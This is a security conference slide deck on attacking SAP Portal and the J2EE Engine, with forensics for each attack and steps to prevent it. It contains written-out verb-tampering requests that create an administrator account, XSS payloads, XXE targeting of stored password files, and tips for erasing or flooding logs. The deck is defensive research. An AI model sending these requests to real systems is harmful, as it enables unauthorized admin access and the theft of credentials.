Invest in security to secure investments

Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
About ERPScan

• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
Agenda

• Why SAP
• Why SAP forensics
• Why it is hard
• Attack examples and forensics
  – Simple attacks
  – Advanced attacks
• Defense
• Conclusion
SAP

• The most popular business application
• More than 180000 customers worldwide
• 74% of Forbes 500 run SAP
• 300+ clients in South Africa by 2004
• Almost every South African government body runs SAP
Why SAP Security?

• Espionage
  – Theft of financial information
  – Corporate secret and information theft
  – Supplier and customer list theft
  – HR data theft
• Sabotage
  – Denial of service
  – Tampering with financial records
  – Access to technology network (SCADA) by trust relations
• Fraud
  – False transactions
  – Modification of master data

http://erpscan.com/wp-content/uploads/2012/06/SAP-Security-in-figures-a-global-survey-2007-2011-final.pdf
How easy? SAP Security Notes

[Chart: number of SAP Security Notes per year, 2001-2013; y-axis 0-900]
Is it popular? Talks about SAP security

[Chart: number of talks about SAP security per year, 2006-2012; y-axis 0-35]

• BlackHat
• HITB
• Troopers
• RSA
• Source
• ITWeb
• DeepSec

Source: SAP Security in Figures 2013
Is it remotely exploitable?
Is it relevant for South Africa?

Simple scan for SAP routers exposed to the Internet:
• 63 SAP Routers found on the default port
• 27 SAP Routers with medium-critical issues
• 7 SAP Routers with high-critical issues

Number of web-based SAP systems found:
• 20 by Shodan
What about other services?

[Chart: exposed SAP services found worldwide, by type: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd; y-axis 0-16]
Who actually tried to break SAP?

Now, it adds, “We gained full access to the Greek Ministry of Finance. Those funky IBM servers don't look so safe now, do they...” Anonymous claims to have a “sweet 0day SAP exploit”, and the group intends to “sploit the hell out of it.”

* This attack has not been confirmed by the customer nor by the police authorities in Greece investigating the case. SAP does not have any indication that it happened.
What about unpublished threats?

• Companies are not interested in publishing information about their breaches
• There are a lot of internal breaches thanks to unnecessarily given authorizations (an employee by mistake buys hundreds of excavators instead of ten)
• There are known stories about backdoors left by developers in custom ABAP code
• How can you be sure that, if a breach occurs, you can find evidence?
SAP Forensics

• If there are no attacks, it doesn’t mean anything
• Companies don’t like to share it
• Companies don’t use security audit: ~10%
• Even if used, nobody manages it: ~5%
• Even if managed, no correlation: ~1%
Typical SAP audit options

• ICM log (icm/HTTP/logging_0): 70%
• Security audit log in ABAP: 10%
• Table access logging (rec/client): 4%
• Message Server log (ms/audit): 2%
• SAP Gateway access log: 2%

% of companies (based on our security assessments and product implementations)
What do we see?

• A lot of research
• Real attacks
• Lack of logging practice
• Many vulnerabilities are hard to close → we need to monitor them, at least
• Ideally, we should control everything, but this talk has limits, so let’s focus on the most critical areas
What do we need to monitor?

External attacks on SAP:
• Attacks on users and SAP GUI → Awareness
• SAP Router → Secure configuration and patch management
• Exposed SAP services → Disable them
• SAP Portal → Too many issues and custom configuration; may be 0-days; need to concentrate on this area
SAP Portal

• Point of web access to SAP systems
• Point of web access to other corporate systems
• Way for attackers to get access to SAP from the Internet

Portal architecture
Let’s begin the technical part

Full logging is not always the best option
* not only because of system high load
Full logging is not always the best option

• SAP MMC – centralized system management
• Allows you to see the trace and log messages
• If TRACE_LEVEL = 3 → JSESSIONIDs are stored in logs
• \<SID>\DVEBMGS<id>\j2ee\cluster\server0\log\system\userinterface.log
• It’s not bad if you only use it sometimes and delete logs after use, but…
But sometimes…

• SAP MMC has remote commands
• By default, many commands go without auth
• Commands are simple SOAP requests
• Attacker can read logs without auth
• And read JSESSIONIDs stored in logs
• And use them for logging into SAP Portal

http://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
Prevention

• Don’t use TRACE_LEVEL = 3
• Delete traces when work is finished
• Limit access to dangerous methods
• Install notes 927637 and 1439348
• Mask security-sensitive data in HTTP access log
Masking security-sensitive data in HTTP log

• The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
• By default, only for the items listed below:
  - Path parameter: jsessionid
  - Request parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
  - HTTP headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)

http://help.sap.com/saphelp_nwce71/helpdata/en/79/77b142c444c96ae10000000a155106/content.htm
SAP Attacks and Forensics
* Only J2EE engine
SAP Logging

If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher’s CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).

* Not the only…. There are many complex attacks with POST requests.

http://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm
SAP J2EE Logging

• Categories of system events recording:
  - System – all system-related security and administrative logs.
  - Applications – all system events related to business logic.
  - Performance – reserved for single activity tracing.
• Default location of these files in your file system: \usr\sap\<sid>\<id>\j2ee\cluster\<node>\log
• The developer trace files of the Java instance:
  - \<SID>\<instance name>\work
• The developer trace files of the central services:
  - \<SID>\<instance name>\work
  - \<SID>\<instance name>\log
• Java server logs:
  - \<SID>\<instance name>\j2ee\cluster\server<n>\log
Simple attacks

• Information disclosure and XSS
• Verb Tampering via HEAD
• Invoker servlet via GET

All that can be found in HTTP headers: \j2ee\cluster\<node>\log\system\httpaccess\responses.trc
XSS: Forensics

#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
Verb Tampering: Description (web.xml)

<servlet>
  <servlet-name>CriticalAction</servlet-name>
  <servlet-class>com.sap.admin.Critical.Action</servlet-class>
</servlet>
<servlet-mapping>
  <servlet-name>CriticalAction</servlet-name>
  <url-pattern>/admin/critical</url-pattern>
</servlet-mapping>
<security-constraint>
  <web-resource-collection>
    <web-resource-name>Restricted access</web-resource-name>
    <url-pattern>/admin/*</url-pattern>
    <!-- only GET is constrained; other verbs such as HEAD are not covered by this constraint -->
    <http-method>GET</http-method>
  </web-resource-collection>
  <auth-constraint>
    <role-name>administrator</role-name>
  </auth-constraint>
</security-constraint>
Verb Tampering: Attack

• Create a new user ITWEB:ITWEB

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB

• Add the user ITWEB to the group Administrators

HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=ITWEB,GROUPNAME=Administrators

Works when UME uses the JAVA database
Verb Tampering: Prevention

• Install SAP Notes 1503579, 1616259
• Install other SAP Notes about Verb Tampering
• Scan applications with ERPScan WEB.XML checker
• Disable the applications that are not necessary
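The kind of check the "WEB.XML checker" bullet refers to can be illustrated with a small descriptor scanner. This is an added example, not ERPScan's tool and not SAP code: it assumes a plain Java EE web.xml layout (with or without the javaee namespace) and runs on a constructed descriptor built from the fragment on the description slide; the second, method-less constraint is added to show the safe form.

```python
import xml.etree.ElementTree as ET

# Constructed deployment descriptor based on the fragment on the slide: the
# first constraint lists only GET, the second lists no method at all.
SAMPLE_WEB_XML = """<web-app>
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restricted access</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint><role-name>administrator</role-name></auth-constraint>
  </security-constraint>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Reports</web-resource-name>
      <url-pattern>/reports/*</url-pattern>
    </web-resource-collection>
    <auth-constraint><role-name>administrator</role-name></auth-constraint>
  </security-constraint>
</web-app>
"""


def _local(tag):
    """Strip a namespace prefix such as {http://java.sun.com/xml/ns/javaee}."""
    return tag.rsplit("}", 1)[-1]


def _children(elem, name):
    return [c for c in elem if _local(c.tag) == name]


def find_verb_tampering(web_xml):
    """List every web-resource-collection whose constraint names explicit
    HTTP methods: any verb not in the list (HEAD, PUT, ...) reaches the
    protected URL pattern without the auth-constraint being applied."""
    findings = []
    for sc in ET.fromstring(web_xml).iter():
        if _local(sc.tag) != "security-constraint":
            continue
        for wrc in _children(sc, "web-resource-collection"):
            methods = [m.text.strip().upper()
                       for m in _children(wrc, "http-method") if m.text]
            if not methods:
                continue  # no method list: the constraint covers all verbs
            names = [n.text for n in _children(wrc, "web-resource-name")]
            findings.append({
                "name": names[0] if names else "",
                "patterns": [p.text for p in _children(wrc, "url-pattern")],
                "methods": methods,
            })
    return findings


def harden(web_xml):
    """Return the descriptor with every <http-method> removed, so that each
    security-constraint applies to all HTTP verbs."""
    root = ET.fromstring(web_xml)
    for wrc in list(root.iter()):
        if _local(wrc.tag) == "web-resource-collection":
            for m in _children(wrc, "http-method"):
                wrc.remove(m)
    return ET.tostring(root, encoding="unicode")
```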
  
Verb Tampering: Forensics

[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB HTTP/1.0 200 0
Invoker Servlet: Attack

Invoker Servlet: Forensics (user creation)

#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:hacker | | SET_ATTRIBUTE: uniquename=[hacker]#
#1.5#000C29C2603300790000003B000008700004D974E7CD3828#1364996035234#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e26]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Warning#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USERACCOUNT.CREATE | UACC.PRIVATE_DATASOURCE.un:hacker | | SET_ATTRIBUTE: userid=[USER.PRIVATE_DATASOURCE.un:hacker]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#

Invoker servlet: Prevention

• Update to the latest patches 1467771, 1445998
• “EnableInvokerServletGlobally” must be “false”
• Check all WEB.XML files with ERPScan WEBXML checker
 
Anti-forensics for simple attacks

• Overwrite log file with trash requests
• Disable logs (needs server restart)
• Delete logs (not so easy)

* There should be a separate place for logs to prevent modifications and find those types of attacks
Advanced attacks

• CSRF in Webdynpro JAVA
• XXE in Portal
• Malicious upload in Portal

* They all need additional analysis, like enabling POST data logging or indirect signs
Advanced attacks: Webdynpro JAVA

• Webdynpro unauthorized modifications
• For example:
  - somebody steals an account using XSS/CSRF/sniffing
  - then tries to modify the severity level of logs

http://help.sap.com/saphelp_nw70/helpdata/en/42/fa080514793ee6e10000000a1553f7/frameset.htm
  
Advanced attacks: Webdynpro JAVA

• No traces of change in default log files: \j2ee\cluster\server0\log\system\httpaccess\responses.log
• Webdynpro sends all data by POST, and we only see GET URLs in responses.log
• But sometimes we can find information by indirect signs:

[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110

• Client loaded images from the server during some changes
Webdynpro JAVA: Forensics

• Most actions have icons
• They have to be loaded from the server
• Usually, legitimate users have them all in cache
• Attackers usually don’t have them, so they make requests to the server
• That’s how we can identify potentially malicious actions
• But there should be correlation with a real user’s activity
• False positives are possible:
  - New legitimate user
  - Old user clears cache
  - Other
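To show how the indirect signs on this slide, the Verb Tampering forensics entries and the Knowledge Management upload entries further on can be turned into detection logic over responses.log, here is an added example (not part of the slides and not an ERPScan tool). It assumes the responses.log line layout seen in the slides, runs over a constructed log sample modelled on them, and the rule names and the 5-second correlation window are my own choices.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the responses.log layout shown on these slides; the
# request lines are modelled on the slides' own examples.
SAMPLE_LOG = """\
[Apr 3, 2013 1:23:59 AM   ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM   ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB HTTP/1.0 200 0
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
[Apr 10, 2013 2:40:00 AM ] - 10.0.0.5 : GET /irj/portal HTTP/1.1 200 5120
"""

# [timestamp ] - client : METHOD path HTTP/x.y status size
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+?)\s*\]\s*-\s*(?P<ip>\S+)\s*:\s*(?P<method>[A-Z]+)\s+"
    r"(?P<path>\S+)\s+HTTP/[\d.]+\s+(?P<status>\d{3})\s+(?P<size>\d+)\s*$"
)
# MIME icon KM shows for a stored document: html.gif -> an HTML file
MIME_ICON_RE = re.compile(r"^/irj/go/km/docs/etc/public/mimes/images/(\w+)\.gif$")
# user-management operations of the ConfigServlet shown on the attack slide
UME_OP_RE = re.compile(r";(CREATEUSER|ADD_USER_TO_GROUP)\b")


def parse_line(line):
    """Parse one responses.log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"].strip(), "%b %d, %Y %I:%M:%S %p")
    rec["status"] = int(rec["status"])
    rec["path"], _, rec["query"] = rec["path"].partition("?")
    return rec


def analyze(log_text, window=timedelta(seconds=5)):
    """Return (timestamp, client, rule, detail) tuples for suspicious requests."""
    alerts = []
    last_km_post = {}  # client -> time of its last KM document POST
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        ts, ip, path, query = rec["ts"], rec["ip"], rec["path"], rec["query"]
        # Verb tampering: ConfigServlet reached with a verb the security
        # constraint does not list (the slides show HEAD answered with 200)
        if path.startswith("/ctc/ConfigServlet"):
            if rec["method"] not in ("GET", "POST"):
                alerts.append((ts, ip, "verb_tampering",
                               f"{rec['method']} /ctc/ConfigServlet -> {rec['status']}"))
            if UME_OP_RE.search(query):
                alerts.append((ts, ip, "ume_change_via_configservlet", query))
        # Indirect sign: a Log Configurator icon fetched from the server
        if (rec["method"] == "GET" and path.startswith("/webdynpro/resources/")
                and "log_config" in path and path.endswith(".gif")):
            alerts.append((ts, ip, "log_configurator_ui",
                           "Webdynpro icon load suggests interactive log configuration"))
        # Indirect sign: a KM document POST followed within the window by the
        # MIME icon of the stored file type from the same client
        if rec["method"] == "POST" and "com.sap.km." in path and path.endswith("/documents"):
            last_km_post[ip] = ts
        icon = MIME_ICON_RE.match(path)
        if icon and ip in last_km_post and ts - last_km_post[ip] <= window:
            alerts.append((ts, ip, "km_upload",
                           f"file of type '{icon.group(1)}' uploaded via Knowledge Management"))
    return alerts
```

As the slide says, these are indirect signs and must be correlated with real user activity before being treated as incidents.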
  
XXE in Portal: Details

• Injection of malicious requests into XML packets
• Can lead to unauthorized file read, DoS, SSRF
• There is an XXE vulnerability in SAP Portal
• Can be exploited by modification of POST request
• It is possible to read any file from OS and much more

XXE in Portal: Attack
XXE in Portal: Result

• We can read any file
• Including config with passwords
• The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
• \usr\sap\<SID>\SYS\global\security\data\SecStore.properties
XXE in Portal: Prevention

• Install SAP note 1619539
• Restrict read access to files SecStore.properties and SecStore.key
XXE in Portal: Forensics Fail

POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fadministrator!2fsuper_admin!2fsuper_admin_role!2fcom.sap.portal.content_administration!2fcom.sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplorer!2fcom.sap.km.AdminExplorer/ HTTP/1.1
XXE in Portal: Forensics

• The only way to get HTTP POST request values is to enable HTTP Trace.
• Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable.
  - For 6.4 and 7.0 SP12 and lower:
    o On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
    o On Server: \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
  - For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/req_resp.trc
• And then you need to manually analyze all requests to see if there are any XXE attacks.
Malicious file upload: Attack

• Knowledge Management allows uploading to the server different types of files that can store malicious content
• Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
• For example, it can be an HTML file with JavaScript that steals cookies
Malicious file upload: Forensics

• [Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
• [Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
• * Again, images can help us
Malicious file upload: Prevention

• Enable File Extension and Size Filter.
  - System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter
  - You must select either the All repositories parameter, or at least one repository from the repository list in the Repositories parameter. Otherwise, the filter is not created.
• Enable Malicious Script Filter.
  - System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter
  - The filter also detects executable scripts in files that are being modified and encodes them when they are saved
    o Enable Forbidden Scripts: comma-separated list of banned script tags that will be encoded when the filter is applied.
    o Enable the Send E-Mail to Administrator option.
Filtering EPCF in XSS

• EPCF provides a JavaScript API for client-side communication between the Portal components and the Portal core framework
• EPCM (Enterprise Portal Client Manager)
• iViews can access the EPCM object from every page
• Every iView contains the EPCM object
• For example, EPCF is used to transmit the user data buffer for iViews
• <SCRIPT>alert(EPCM.loadClientData("urn:com.sap.myObjects","person"));</SCRIPT>
Advanced attacks: Anti-Forensics

• If all trace is enabled, it can downgrade speed
• It can also occupy all the storage volume
• If an attacker wants to spam logs with trash values, he can do it much faster than just with GET logs
Securing SAP Portal

• Patching
• Secure configuration
• Enabling HTTP Trace with masking
• Malicious script filter
• Log archiving
• Additional place for log storage
• Correlation of security events
Portal post-exploitation

And one more thing:
• Portal has connections with a lot of systems in corporate LAN
• Using SSRF, attackers can get access to these systems
SSRF attacks

[Diagram: attacker A, HTTP Server, host B in the corporate network; a direct attack (GET /vuln.jsp) against B compared with an SSRF attack relayed through the HTTP Server that issues GET /vuln.jsp to B]

http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf
Gopher URI scheme

Using the gopher:// URI scheme, it is possible to send TCP packets:
• Exploit OS vulnerabilities
• Exploit old SAP application vulnerabilities
• Bypass SAP security restrictions
• Exploit vulnerabilities in local services

More info in our BH2012 presentation: SSRF vs. Business Critical Applications
Conclusion

It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure.

SAP Guides

It’s all in your hands:
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of Duties
Future work

• I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
• May 21 – Training at AusCert (Gold Coast, Australia)
• June 5-6 – Presentation at RSA (Marina Bay Sands, Singapore)
• September 10-12 – BlackHat Trainings (Istanbul, Turkey)

An easy way into your sap systems v3.0
Cyber Security Alliance
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Security
Priyanka Aash
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
ERPScan
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis Inc.
 
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsMySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
Olivier DASINI
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
PROIDEA
 
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
PeterSmetny1
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
Onapsis Inc.
 
Best Practices for a Complete Postgres Enterprise Architecture Setup
Best Practices for a Complete Postgres Enterprise Architecture SetupBest Practices for a Complete Postgres Enterprise Architecture Setup
Best Practices for a Complete Postgres Enterprise Architecture Setup
EDB
 
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP SystemsExploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Onapsis Inc.
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
Positive Hack Days
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
ERPScan
 
Top 5 .NET Challenges, Performance Monitoring Tips & Tricks
Top 5 .NET Challenges, Performance Monitoring Tips & TricksTop 5 .NET Challenges, Performance Monitoring Tips & Tricks
Top 5 .NET Challenges, Performance Monitoring Tips & Tricks
AppDynamics
 
CoreToEdge Company Presentation
CoreToEdge Company PresentationCoreToEdge Company Presentation
CoreToEdge Company Presentation
Core To Edge
 

Similar to Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine (20)

SAP security made easy
SAP security made easySAP security made easy
SAP security made easy
 
Top 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAPTop 10 most interesting vulnerabilities and attacks in SAP
Top 10 most interesting vulnerabilities and attacks in SAP
 
Architecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platformsArchitecture vulnerabilities in SAP platforms
Architecture vulnerabilities in SAP platforms
 
A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine. A crushing blow at the heart of SAP’s J2EE Engine.
A crushing blow at the heart of SAP’s J2EE Engine.
 
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy...
 
Practical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applicationsPractical pentesting of ERPs and business applications
Practical pentesting of ERPs and business applications
 
An easy way into your sap systems v3.0
An easy way into your sap systems v3.0An easy way into your sap systems v3.0
An easy way into your sap systems v3.0
 
ciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Securityciso-platform-annual-summit-2013-New Framework for ERP Security
ciso-platform-annual-summit-2013-New Framework for ERP Security
 
What CISOs should know about SAP security
What CISOs should know about SAP securityWhat CISOs should know about SAP security
What CISOs should know about SAP security
 
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP ForensicsOnapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
Onapsis SAP Forensics: Detecting White-Collar Cyber Crime with SAP Forensics
 
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirementsMySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
MySQL Day Paris 2018 - MySQL & GDPR; Privacy and Security requirements
 
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to usCONFidence 2014: Dimitriy Chastuhin:  All your sap p@$$w0яd z belong to us
CONFidence 2014: Dimitriy Chastuhin: All your sap p@$$w0яd z belong to us
 
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
Accelerate2022-Solving the SAP Security Gap through Application-aware Network...
 
SAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crimeSAP Forensics Detecting White Collar Cyber-crime
SAP Forensics Detecting White Collar Cyber-crime
 
Best Practices for a Complete Postgres Enterprise Architecture Setup
Best Practices for a Complete Postgres Enterprise Architecture SetupBest Practices for a Complete Postgres Enterprise Architecture Setup
Best Practices for a Complete Postgres Enterprise Architecture Setup
 
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP SystemsExploiting Critical Attack Vectors to Gain Control of SAP Systems
Exploiting Critical Attack Vectors to Gain Control of SAP Systems
 
SAP (In)Security: New and Best
SAP (In)Security: New and BestSAP (In)Security: New and Best
SAP (In)Security: New and Best
 
ERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, SolutionsERP Security. Myths, Problems, Solutions
ERP Security. Myths, Problems, Solutions
 
Top 5 .NET Challenges, Performance Monitoring Tips & Tricks
Top 5 .NET Challenges, Performance Monitoring Tips & TricksTop 5 .NET Challenges, Performance Monitoring Tips & Tricks
Top 5 .NET Challenges, Performance Monitoring Tips & Tricks
 
CoreToEdge Company Presentation
CoreToEdge Company PresentationCoreToEdge Company Presentation
CoreToEdge Company Presentation
 

Recently uploaded

Hand Rolled Applicative User Validation Code Kata
Hand Rolled Applicative User ValidationCode KataHand Rolled Applicative User ValidationCode Kata
Hand Rolled Applicative User Validation Code Kata
Philip Schwarz
 
Energy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina JonuziEnergy consumption of Database Management - Florina Jonuzi
Energy consumption of Database Management - Florina Jonuzi
Green Software Development
 
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j - Product Vision and Knowledge Graphs - GraphSummit Paris
Neo4j
 
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdfAutomated software refactoring with OpenRewrite and Generative AI.pptx.pdf
Automated software refactoring with OpenRewrite and Generative AI.pptx.pdf
timtebeek1
 
Empowering Growth with Best Software Development Company in Noida - Deuglo
Empowering Growth with Best Software  Development Company in Noida - DeugloEmpowering Growth with Best Software  Development Company in Noida - Deuglo
Empowering Growth with Best Software Development Company in Noida - Deuglo
Deuglo Infosystem Pvt Ltd
 
Essentials of Automations: The Art of Triggers and Actions in FME
